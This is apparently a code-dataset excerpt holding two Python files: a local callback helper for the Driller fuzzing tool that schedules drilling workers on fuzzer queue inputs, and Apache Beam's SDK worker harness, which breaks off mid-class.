source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
local_callback.py | import os
import sys
import signal
import logging.config
import driller
import argparse
import subprocess
import multiprocessing
l = logging.getLogger("local_callback")
def _run_drill(drill, fuzz, _path_to_input_to_drill, length_extension=None):
_binary_path = fuzz.binary_path
_fuzzer_out_dir = fuzz.out_dir
_bitmap_path = os.path.join(_fuzzer_out_dir, 'fuzzer-master', "fuzz_bitmap")
_timeout = drill._worker_timeout
l.warning("starting drilling of %s, %s", os.path.basename(_binary_path), os.path.basename(_path_to_input_to_drill))
args = (
"timeout", "-k", str(_timeout+10), str(_timeout),
sys.executable, os.path.abspath(__file__),
_binary_path, _fuzzer_out_dir, _bitmap_path, _path_to_input_to_drill
)
if length_extension:
args += ('--length-extension', str(length_extension))
p = subprocess.Popen(args, stdout=subprocess.PIPE)
print(p.communicate())
class LocalCallback(object):
def __init__(self, num_workers=1, worker_timeout=10*60, length_extension=None):
self._already_drilled_inputs = set()
self._num_workers = num_workers
self._running_workers = []
self._worker_timeout = worker_timeout
self._length_extension = length_extension
@staticmethod
def _queue_files(fuzz, fuzzer='fuzzer-master'):
'''
retrieve the current queue of inputs from a fuzzer
:return: a list of strings which represent a fuzzer's queue
'''
queue_path = os.path.join(fuzz.out_dir, fuzzer, 'queue')
queue_files = filter(lambda x: x != ".state", os.listdir(queue_path))
queue_files = [os.path.join(queue_path, q) for q in queue_files]
return queue_files
def driller_callback(self, fuzz):
l.warning("Driller stuck callback triggered!")
# remove any workers that aren't running
self._running_workers = [x for x in self._running_workers if x.is_alive()]
# get the files in queue
queue = self._queue_files(fuzz)
#for i in range(1, fuzz.fuzz_id):
# fname = "fuzzer-%d" % i
# queue.extend(self.queue_files(fname))
# start drilling
not_drilled = set(queue) - self._already_drilled_inputs
if len(not_drilled) == 0:
l.warning("no inputs left to drill")
while len(self._running_workers) < self._num_workers and len(not_drilled) > 0:
to_drill_path = list(not_drilled)[0]
not_drilled.remove(to_drill_path)
self._already_drilled_inputs.add(to_drill_path)
proc = multiprocessing.Process(target=_run_drill, args=(self, fuzz, to_drill_path),
kwargs={'length_extension': self._length_extension})
proc.start()
self._running_workers.append(proc)
__call__ = driller_callback
def kill(self):
for p in self._running_workers:
try:
p.terminate()
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
# this is for running with bash timeout
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Driller local callback")
parser.add_argument('binary_path')
parser.add_argument('fuzzer_out_dir')
parser.add_argument('bitmap_path')
parser.add_argument('path_to_input_to_drill')
parser.add_argument('--length-extension', help="Try extending inputs to driller by this many bytes", type=int)
args = parser.parse_args()
logcfg_file = os.path.join(os.getcwd(), '.driller.ini')
if os.path.isfile(logcfg_file):
logging.config.fileConfig(logcfg_file)
binary_path, fuzzer_out_dir, bitmap_path, path_to_input_to_drill = sys.argv[1:5]
fuzzer_bitmap = open(args.bitmap_path, "rb").read()
# create a folder
driller_dir = os.path.join(args.fuzzer_out_dir, "driller")
driller_queue_dir = os.path.join(driller_dir, "queue")
try: os.mkdir(driller_dir)
except OSError: pass
try: os.mkdir(driller_queue_dir)
except OSError: pass
l.debug('drilling %s', path_to_input_to_drill)
# get the input
inputs_to_drill = [open(args.path_to_input_to_drill, "rb").read()]
if args.length_extension:
inputs_to_drill.append(inputs_to_drill[0] + '\0' * args.length_extension)
for input_to_drill in inputs_to_drill:
d = driller.Driller(args.binary_path, input_to_drill, fuzzer_bitmap)
count = 0
for new_input in d.drill_generator():
id_num = len(os.listdir(driller_queue_dir))
fuzzer_from = args.path_to_input_to_drill.split("sync/")[1].split("/")[0] + args.path_to_input_to_drill.split("id:")[1].split(",")[0]
filepath = "id:" + ("%d" % id_num).rjust(6, "0") + ",from:" + fuzzer_from
filepath = os.path.join(driller_queue_dir, filepath)
with open(filepath, "wb") as f:
f.write(new_input[1])
count += 1
l.warning("found %d new inputs", count)
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
# mypy: disallow-untyped-defs
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from concurrent import futures
from types import TracebackType
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import grpc
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.runners.worker.worker_status import thread_dump
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
ExcInfo = Tuple[Type[BaseException], BaseException, TracebackType]
OptExcInfo = Union[ExcInfo, Tuple[None, None, None]]
T = TypeVar('T')
_KT = TypeVar('_KT')
_VT = TypeVar('_VT')
_LOGGER = logging.getLogger(__name__)
# This SDK harness will (by default), log a "lull" in processing if it sees no
# transitions in over 5 minutes.
# 5 minutes * 60 seconds * 1000 millis * 1000 micros * 1000 nanoseconds
DEFAULT_LOG_LULL_TIMEOUT_NS = 5 * 60 * 1000 * 1000 * 1000
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# Full thread dump is performed at most every 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S = 20 * 60
# Full thread dump is performed if the lull is more than 20 minutes.
LOG_LULL_FULL_THREAD_DUMP_LULL_S = 20 * 60
# The number of ProcessBundleRequest instruction ids the BundleProcessorCache
# will remember for not running instructions.
MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS = 1000
# The number of ProcessBundleRequest instruction ids that BundleProcessorCache
# will remember for failed instructions.
MAX_FAILED_INSTRUCTIONS = 10000
class ShortIdCache(object):
""" Cache for MonitoringInfo "short ids"
"""
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._last_short_id = 0
self._info_key_to_short_id = {} # type: Dict[FrozenSet, str]
self._short_id_to_info = {} # type: Dict[str, metrics_pb2.MonitoringInfo]
def get_short_id(self, monitoring_info):
# type: (metrics_pb2.MonitoringInfo) -> str
""" Returns the assigned shortId for a given MonitoringInfo, assigns one if
not assigned already.
"""
key = monitoring_infos.to_key(monitoring_info)
with self._lock:
try:
return self._info_key_to_short_id[key]
except KeyError:
self._last_short_id += 1
# Convert to a hex string (and drop the '0x') for some compression
shortId = hex(self._last_short_id)[2:]
payload_cleared = metrics_pb2.MonitoringInfo()
payload_cleared.CopyFrom(monitoring_info)
payload_cleared.ClearField('payload')
self._info_key_to_short_id[key] = shortId
self._short_id_to_info[shortId] = payload_cleared
return shortId
def get_infos(self, short_ids):
#type: (Iterable[str]) -> Dict[str, metrics_pb2.MonitoringInfo]
""" Gets the base MonitoringInfo (with payload cleared) for each short ID.
Throws KeyError if an unassigned short ID is encountered.
"""
return {
short_id: self._short_id_to_info[short_id]
for short_id in short_ids
}
SHORT_ID_CACHE = ShortIdCache()
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
def __init__(
self,
control_address, # type: str
credentials=None, # type: Optional[grpc.ChannelCredentials]
worker_id=None, # type: Optional[str]
# Caching is disabled by default
state_cache_size=0, # type: int
# time-based data buffering is disabled by default
data_buffer_time_limit_ms=0, # type: int
profiler_factory=None, # type: Optional[Callable[..., Profile]]
status_address=None, # type: Optional[str]
# Heap dump through status api is disabled by default
enable_heap_dump=False, # type: bool
):
# type: (...) -> None
self._alive = True
self._worker_index = 0
self._worker_id = worker_id
self._state_cache = StateCache(state_cache_size)
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if credentials is None:
_LOGGER.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address, options=options)
else:
_LOGGER.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials, options=options)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
_LOGGER.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id, data_buffer_time_limit_ms)
self._state_handler_factory = GrpcStateHandlerFactory(
self._state_cache, credentials)
self._profiler_factory = profiler_factory
def default_factory(id):
# type: (str) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._control_stub.GetProcessBundleDescriptor(
beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
process_bundle_descriptor_id=id))
self._fns = KeyedDefaultDict(default_factory)
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
if status_address:
try:
self._status_handler = FnApiWorkerStatusHandler(
status_address, self._bundle_processor_cache,
enable_heap_dump) # type: Optional[FnApiWorkerStatusHandler]
except Exception:
traceback_string = traceback.format_exc()
_LOGGER.warning(
'Error creating worker status request handler, '
'skipping status report. Trace back: %s' % traceback_string)
else:
self._status_handler = None
# TODO(BEAM-8998) use common
# thread_pool_executor.shared_unbounded_instance() to process bundle
# progress once dataflow runner's excessive progress polling is removed.
self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
self._responses = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.InstructionResponse, Sentinel]]
_LOGGER.info('Initializing SDKHarness with unbounded number of workers.')
def run(self):
# type: () -> None
self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
self._control_channel)
no_more_work = Sentinel.sentinel
def get_responses():
# type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
try:
for work_request in self._control_stub.Control(get_responses()):
_LOGGER.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
_LOGGER.info('No more requests from control plane')
_LOGGER.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._worker_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
self._bundle_processor_cache.shutdown()
if self._status_handler:
self._status_handler.close()
_LOGGER.info('Done consuming work.')
def _execute(
self,
task, # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
request # type: beam_fn_api_pb2.InstructionRequest
):
# type: (...) -> None
with statesampler.instruction_id(request.instruction_id):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
_LOGGER.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id,
traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
# registration request is handled synchronously
self._execute(lambda: self.create_worker().do_instruction(request), request)
def _request_process_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._bundle_processor_cache.activate(request.instruction_id)
self._request_execute(request)
def _request_process_bundle_split(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._report_progress_executor.submit(task)
def _request_finalize_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_harness_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
process_wide_monitoring_infos = MetricsEnvironment.process_wide_container(
).to_runner_api_monitoring_infos(None).values()
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
harness_monitoring_infos=(
beam_fn_api_pb2.HarnessMonitoringInfosResponse(
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in process_wide_monitoring_infos
}))),
request)
def _request_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
monitoring_infos=beam_fn_api_pb2.MonitoringInfosMetadataResponse(
monitoring_info=SHORT_ID_CACHE.get_infos(
request.monitoring_infos.monitoring_info_id))),
request)
def _request_execute(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._worker_thread_pool.submit(task)
_LOGGER.debug(
"Currently using %s threads." % len(self._worker_thread_pool._workers))
def create_worker(self):
# type: () -> SdkWorker
return SdkWorker(
self._bundle_processor_cache,
state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
data_channel_factory (``data_plane.DataChannelFactory``)
active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
containing ``bundle_processor.BundleProcessor`` objects that are currently
active processing the corresponding instruction.
cached_bundle_processors (dict): A dictionary, indexed by bundle processor
id, of cached ``bundle_processor.BundleProcessor`` that are not currently
performing processing.
"""
periodic_shutdown = None # type: Optional[PeriodicThread]
def __init__(
self,
state_handler_factory, # type: StateHandlerFactory
data_channel_factory, # type: data_plane.DataChannelFactory
fns # type: MutableMapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
):
# type: (...) -> None
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.known_not_running_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.failed_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.active_bundle_processors = {
} # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
self.cached_bundle_processors = collections.defaultdict(
list) # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
self.last_access_times = collections.defaultdict(
float) # type: DefaultDict[str, float]
self._schedule_periodic_shutdown()
self._lock = threading.Lock()
def register(self, bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def activate(self, instruction_id):
# type: (str) -> None
"""Makes the ``instruction_id`` known to the bundle processor.
Allows ``lookup`` to return ``None``. Necessary if ``lookup`` can occur
before ``get``.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
def get(self, instruction_id, bundle_descriptor_id):
# type: (str, str) -> bundle_processor.BundleProcessor
"""
Return the requested ``BundleProcessor``, creating it if necessary.
Moves the ``BundleProcessor`` from the inactive to the active cache.
"""
with self._lock:
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
except IndexError:
pass
# Make sure we instantiate the processor while not holding the lock.
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
with self._lock:
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
def lookup(self, instruction_id):
# type: (str) -> Optional[bundle_processor.BundleProcessor]
"""
Return the requested ``BundleProcessor`` from the cache.
Will return ``None`` if the BundleProcessor is known but not yet ready. Will
raise an error if the ``instruction_id`` is not known or has been discarded.
"""
with self._lock:
if instruction_id in self.failed_instruction_ids:
raise RuntimeError(
'Bundle processing associated with %s has failed. '
'Check prior failing response for details.' % instruction_id)
processor = self.active_bundle_processors.get(
instruction_id, (None, None))[-1]
if processor:
return processor
if instruction_id in self.known_not_running_instruction_ids:
return None
raise RuntimeError('Unknown process bundle id %s.' % instruction_id)
def discard(self, instruction_id):
# type: (str) -> None
"""
Marks the instruction id as failed shutting down the ``BundleProcessor``.
"""
with self._lock:
self.failed_instruction_ids[instruction_id] = True
while len(self.failed_instruction_ids) > MAX_FAILED_INSTRUCTIONS:
self.failed_instruction_ids.popitem(last=False)
processor = self.active_bundle_processors[instruction_id][1]
del self.active_bundle_processors[instruction_id]
# Perform the shutdown while not holding the lock.
processor.shutdown()
def release(self, instruction_id):
# type: (str) -> None
"""
Release the requested ``BundleProcessor``.
Resets the ``BundleProcessor`` and moves it from the active to the
inactive cache.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
while len(self.known_not_running_instruction_ids
) > MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS:
self.known_not_running_instruction_ids.popitem(last=False)
descriptor_id, processor = (
self.active_bundle_processors.pop(instruction_id))
# Make sure that we reset the processor while not holding the lock.
processor.reset()
with self._lock:
self.last_access_times[descriptor_id] = time.time()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
# type: () -> None
"""
Shutdown all ``BundleProcessor``s in the cache.
"""
if self.periodic_shutdown:
self.periodic_shutdown.cancel()
self.periodic_shutdown.join()
self.periodic_shutdown = None
for instruction_id in list(self.active_bundle_processors.keys()):
self.discard(instruction_id)
for cached_bundle_processors in self.cached_bundle_processors.values():
BundleProcessorCache._shutdown_cached_bundle_processors(
cached_bundle_processors)
def _schedule_periodic_shutdown(self):
# type: () -> None
def shutdown_inactive_bundle_processors():
# type: () -> None
for descriptor_id, last_access_time in self.last_access_times.items():
if (time.time() - last_access_time >
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
BundleProcessorCache._shutdown_cached_bundle_processors(
self.cached_bundle_processors[descriptor_id])
self.periodic_shutdown = PeriodicThread(
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
shutdown_inactive_bundle_processors)
self.periodic_shutdown.daemon = True
self.periodic_shutdown.start()
@staticmethod
def _shutdown_cached_bundle_processors(cached_bundle_processors):
# type: (List[bundle_processor.BundleProcessor]) -> None
try:
while True:
# pop() is threadsafe
bundle_processor = cached_bundle_processors.pop()
bundle_processor.shutdown()
except IndexError:
pass
class SdkWorker(object):
def __init__(
self,
bundle_processor_cache, # type: BundleProcessorCache
state_cache_metrics_fn=list, # type: Callable[[], Iterable[metrics_pb2.MonitoringInfo]]
profiler_factory=None, # type: Optional[Callable[..., Profile]]
log_lull_timeout_ns=None, # type: Optional[int]
):
# type: (...) -> None
self.bundle_processor_cache = bundle_processor_cache
self.state_cache_metrics_fn = state_cache_metrics_fn
self.profiler_factory = profiler_factory
self.log_lull_timeout_ns = (
log_lull_timeout_ns or DEFAULT_LOG_LULL_TIMEOUT_NS)
self._last_full_thread_dump_secs = 0.0
def do_instruction(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(
getattr(request, request_type), request.instruction_id)
else:
raise NotImplementedError
def register(
self,
request, # type: beam_fn_api_pb2.RegisterRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(
self,
request, # type: beam_fn_api_pb2.ProcessBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_id)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id, request.cache_tokens):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
monitoring_infos = bundle_processor.monitoring_infos()
monitoring_infos.extend(self.state_cache_metrics_fn())
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
},
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(
self,
request, # type: beam_fn_api_pb2.ProcessBundleSplitRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
process_bundle_split = (
processor.try_split(request)
if processor else beam_fn_api_pb2.ProcessBundleSplitResponse())
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=process_bundle_split)
def _log_lull_in_bundle_processor(self, processor):
# type: (bundle_processor.BundleProcessor) -> None
sampler_info = processor.state_sampler.get_info()
self._log_lull_sampler_info(sampler_info)
def _log_lull_sampler_info(self, sampler_info):
# type: (statesampler.StateSamplerInfo) -> None
if (sampler_info and sampler_info.time_since_transition and
sampler_info.time_since_transition > self.log_lull_timeout_ns):
step_name = sampler_info.state_name.step_name
state_name = sampler_info.state_name.name
lull_seconds = sampler_info.time_since_transition / 1e9
state_lull_log = (
'Operation ongoing for over %.2f seconds in state %s' %
(lull_seconds, state_name))
step_name_log = (' in step %s ' % step_name) if step_name else ''
exec_thread = getattr(sampler_info, 'tracked_thread', None)
if exec_thread is not None:
thread_frame = sys._current_frames().get(exec_thread.ident) # pylint: disable=protected-access
stack_trace = '\n'.join(
traceback.format_stack(thread_frame)) if thread_frame else ''
else:
stack_trace = '-NOT AVAILABLE-'
_LOGGER.warning(
'%s%s without returning. Current Traceback:\n%s',
state_lull_log,
step_name_log,
stack_trace)
if self._should_log_full_thread_dump(lull_seconds):
self._log_full_thread_dump()
def _should_log_full_thread_dump(self, lull_seconds):
# type: (float) -> bool
if lull_seconds < LOG_LULL_FULL_THREAD_DUMP_LULL_S:
return False
now = time.time()
if (self._last_full_thread_dump_secs + LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S
< now):
self._last_full_thread_dump_secs = now
return True
return False
def _log_full_thread_dump(self):
# type: () -> None
thread_dump()
def process_bundle_progress(
self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
self._log_lull_in_bundle_processor(processor)
monitoring_infos = processor.monitoring_infos()
else:
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
monitoring_infos = []
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
}))
def finalize_bundle(
self,
request, # type: beam_fn_api_pb2.FinalizeBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_id)
raise
# We can reach this state if there was an erroneous request to finalize
# the bundle while it is being initialized or has already been finalized
# and released.
raise RuntimeError(
'Bundle is not in a finalizable state for %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
# type: (str) -> Iterator[None]
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandler(metaclass=abc.ABCMeta):
"""An abstract object representing a ``StateHandler``."""
@abc.abstractmethod
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
raise NotImplementedError(type(self))
@abc.abstractmethod
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class StateHandlerFactory(metaclass=abc.ABCMeta):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
# type: () -> None
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, state_cache, credentials=None):
# type: (StateCache, Optional[grpc.ChannelCredentials]) -> None
self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
self._state_cache = state_cache
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
_LOGGER.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
_LOGGER.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
_LOGGER.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor())
self._state_handler_cache[url] = GlobalCachingStateHandler(
self._state_cache,
GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
return self._state_handler_cache[url]
def close(self):
# type: () -> None
_LOGGER.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
self._state_cache.evict_all()
class CachingStateHandler(metaclass=abc.ABCMeta):
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
